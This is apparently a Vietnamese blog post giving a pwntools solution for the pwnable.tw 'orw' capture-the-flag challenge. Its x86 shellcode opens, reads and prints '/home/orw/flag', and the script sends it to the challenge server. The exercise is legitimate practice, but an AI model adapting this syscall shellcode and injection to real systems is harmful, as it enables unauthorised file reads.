Shell xịn ( orw – pwnable.tw )

from pwn import *


shell_read = asm("xor    ecx,ecx;\
				mul    ecx;\
				mov    al,0x5;\
				push   ecx;\
				push   0x67616c66;\
				push   0x2f77726f;\
				push   0x2f656d6f;\
				push  0x682f2f2f;\
				mov    ebx,esp;\
				int    0x80;\
				xchg   ebx,eax;\
				xchg   ecx,eax;\
				mov    al,0x3;\
				xor    edx,edx;\
				mov    dx,0xfff;\
				inc    edx;\
				int    0x80;\
				xchg   edx,eax;\
				xor    eax,eax;\
				mov    al,0x4;\
				mov    bl,0x1;\
				int    0x80;\
				xchg   ebx,eax;\
				int    0x80")


conn = remote("chall.pwnable.tw",10001)

rec_1  = conn.recvuntil("Give my your shellcode:")
print rec_1

conn.sendline(shell_read)
Advertisements

Trả lời

Mời bạn điền thông tin vào ô dưới đây hoặc kích vào một biểu tượng để đăng nhập:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Log Out / Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Log Out / Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Log Out / Thay đổi )

Google+ photo

Bạn đang bình luận bằng tài khoản Google+ Log Out / Thay đổi )

Connecting to %s